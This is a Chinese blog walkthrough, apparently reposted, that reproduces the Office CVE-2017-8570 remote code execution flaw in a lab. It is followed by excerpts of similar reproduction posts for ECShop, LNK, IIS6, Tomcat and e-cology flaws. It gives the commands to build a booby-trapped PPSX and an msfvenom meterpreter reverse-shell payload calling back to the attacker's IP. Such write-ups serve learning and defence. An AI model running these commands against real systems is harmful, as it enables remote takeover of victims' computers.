Office CVE-2017-8570 远程代码执行漏洞复现

最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应。



0x00介绍
CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广。
0X01影响版本
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x02复现
攻击者
操作系统:kali2018
IP:192.168.40.22
受害者
操作系统:win7 x64(office 2007)
IP:192.168.40.159

  1. 我们下载好利用的exp之后,解压打开里面的README.md。进入文件目录输入:cat README.md里面详细讲了操作步骤,讲真readme真的好用。如图:注意图中红框中的ip地址,均为攻击者的ip地址。
  2. 按照上图步骤进行第一步:生成恶意的PPSX文件
    python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc
  3. 第二步:生成反弹shell的exe文件,注意这里要是是64位系统,需要在windows后面加x64
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.40.22 LPORT=4444 -f exe > /var/www/html/shell.exe
  4. 第三步:开启msf的监听
  5. 第四步:生成监听来自ppsx执行反弹shell,自动开启80端口,注意这里的shell文件路径要和之前生成的文件路径一样。不过在进行这一步之前,我先将生成的Incoice.ppsx文件移到/var/www/html下,然后开启Apache服务,本机访问192.168.40.22/Incoice.ppsx,将恶意文件下载下来,随后关闭Apache服务。



    此时这里已经可以看到received request for payload from 192.168.40.159,因为我是运行恶意文件之后截的图。
  6. 受害者打开ppsx文件,即可看到成功反弹shell。期间失败过,shell反弹不了,第二天再试的时候就好了,具体原因就归类于自己粗心吧~~~

    到此为止就已经成功复现该漏洞了。细心+不放弃=成功!

原文地址:http://blog.51cto.com/13539934/2093003

时间: 2024-10-08 09:04:33

Office CVE-2017-8570 远程代码执行漏洞复现的相关文章

Office CVE-2017-8570远程代码执行漏洞复现

实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程,团队合作. 实验内容 Office CVE-2017-8570 CVE-2017-8570漏

ECShop全系列版本远程代码执行漏洞复现

前言 问题发生在user.php的display函数,模版变量可控,导致注入,配合注入可达到远程代码执行 漏洞分析 0x01-SQL注入 先看user.php $back_act变量来源于HTTP_REFERER,我们可控. assign函数用于在模版变量里赋值 再看display函数 读取user_passport.dwt模版文件内容,显示解析变量后的html内容,用_echash做分割,得到$k然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$val内容可随

LNK文件(快捷方式)远程代码执行漏洞复现过程(CVE-2017-8464)

漏洞编号:CVE-2017-8464 漏洞等级:严重 漏洞概要:如果用户打开攻击者精心构造的恶意LNK文件,则会造成远程代码执行.成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限. 攻击者可以通过可移动驱动器(U盘)或远程共享等方式将包含恶意LNK文件和与之相关的恶意二进制文件传播给用户.当用户通过Windows资源管理器或任何能够解析LNK文件的程序打开恶意的LNK文件时,与之关联的恶意二进制代码将在目标系统上执行. 受影响版本 桌面系统:Windows 10, 7, 8.1, 8, V

CVE-2017-7269 IIS6.0远程代码执行漏洞复现

一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三.漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve-2017-7269 IIS6.exe提权工具 3389.bat 四.漏洞复现 1.IIS开启Web

CVE-2019-0232 远程代码执行漏洞-复现

0x00 漏洞介绍 该漏洞是由于Tomcat CGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令注入影响. 该漏洞只影响Windows平台,要求启用了CGIServlet和enableCmdLineArguments参数.但是CGIServlet和enableCmdLineArguments参数默认情况下都不启用. 0x01 漏洞影响范围 Apache Tomcat 9.0.0.M1 to 9.0.17 Apache Tomcat 8.5.0 to 8.5.

泛微e-cology OA Beanshell组件远程代码执行漏洞复现CNNVD-201909-1041

靶机 影响版本 泛微e-cology<=9.0 https://github.com/jas502n/e-cology 部署 复现 /weaver/bsh.servlet.BshServlet POC exec("whoami") 这是BeanShell命令的其他一些示例 source(),run()-将bsh脚本读入该解释器,或在新的解释器中运行 frame()-在Frame或JFrame中显示GUI组件. load(),save()-将可序列化的对象加载或保存到文件中. cd

CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞复现

原文地址:https://www.cnblogs.com/pt007/p/12394722.html

隐藏17年的Office远程代码执行漏洞(CVE-2017-11882)

Preface 这几天关于Office的一个远程代码执行漏洞很流行,昨天也有朋友发了相关信息,于是想复现一下看看,复现过程也比较简单,主要是简单记录下. 利用脚本Github传送地址 ,后面的参考链接都有成功的比较详细的案例了. 主要是要用到如图中的两个脚本,example文件夹中有个doc,应该直接打开就能弹计算器了. 复现过程 国外最先发布的poc地址:https://github.com/embedi/CVE-2017-11882 这里我们使用的是Ridter师傅改进过的脚本:https:

关于发布的CVE-2013-2251漏洞,strust远程代码执行漏洞

(*该漏洞影响版本:Struts 2.0.0 – Struts 2.3.15) (*该博客仅仅只是记录我工作学习时遇到的问题,仅供参考!) (*如果,描述中可能存在错误,请多指教!) 在昨天在对我目前负责的那个项目进行日常维护的时候,系统被别人攻克,上传了一个.txt文件,他人可以直接访问这个项目下txt文件,就可以获取到txt文件内的内容. 首先,介绍下我目前维护的项目,使用的是strust2.1+hibernate3.0架构模式,也就是javaweb+SSH框架,不过为了简化,并没有添加sp